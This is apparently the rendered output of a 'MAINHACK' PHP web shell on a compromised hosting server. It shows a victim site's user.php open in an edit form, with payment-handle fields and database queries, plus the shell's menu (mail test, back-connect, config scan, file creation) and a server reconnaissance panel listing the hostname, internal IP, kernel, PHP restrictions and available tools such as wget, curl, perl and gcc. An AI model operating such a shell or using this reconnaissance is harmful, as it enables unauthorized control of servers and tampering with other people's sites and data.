[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: user.php
<?php include('header.php'); ?> <?php include 'userprofile.php';?> <!-- USER --> <div class="inner-banner"> <img src="images/user-bg.jpg" alt="banner"> </div> <!-- USER --> <div class="user"> <div class="container"> <div class="user-box aos-init aos-animate" data-aos="fade-down" style="transition:all 1600ms ease-in-out;"> <h3> Trial Cards will be <span>available for 3 days</span>. Please make payment to avoid Cancellation or Deactivation of your card </h3> <ul class="pay"> <li><img src="images/paytam-pay.png" alt="Paytm Pay"> <span>Pay With Paytm :<br><?=$paytm?></span></li> <li><img src="images/pho-pay.png" alt="PhonePay"><span>Pay With PhonePay : <br><?=$phonepe?></span></li> <li><img src="images/google-pay.png" alt="Google Pay"> <span>Pay With GPay : <br><?=$gpay?></span></li> </ul> <ul> <li><a href="create-card.php">Create Card</a></li> <li><a href="profile.php">Profile</a></li> </ul> </div> <div class="cards-deta" style="overflow-x:auto;"> <table> <tr> <th>Company Name</th> <th>URL Name</th> <th>Site URL</th> <th>Payment Status</th> <th>Registration Date</th> <th>Edit</th> </tr> <?php $count=1; $sr='visit_card'; $stmt =$show->readwithdata('visit_card','client_id',$_SESSION['login_id']); $num = $stmt->rowCount(); if($num>0){ while ($row1 = $stmt->fetch(PDO::FETCH_ASSOC)){ extract($row1); $id=$row1['id']; ?> <tr> <td><?=$row1['company_name']?></td> <td><?=$link_url?>/<?=$row1['directory_name']?></td> <td><a href="<?=$link_url?>/<?=$row1['directory_name']?>" target='_blank'>Show</a></td> <td><?=$row1['payment_status']?></td> <td><?=date('d-m-Y',strtotime($row1['created_at']))?></td> <td><a href="edit_card.php?cid=<?=base64_encode($row1['card_id'])?>" title="visiting_card Edit"><i class="fa fa-edit"></i></a></td> </tr> <?php } } ?> </table> </div> </div> </div> <style> table { border-collapse: collapse; border-spacing: 0; width: 100%; border: 1px solid #ddd; } th, td { text-align: left; padding: 15px 10px; font-size: 15px; color: #000; font-family: fangsong; } th { text-align: left; padding: 12px 9px; background: #0f0029; color: #fff; font-size: 17px; font-family: 'Open Sans'; } tr:nth-child(even){background-color: #f2f2f2} </style> <?php include('footer.php');?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 677.57 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: 1619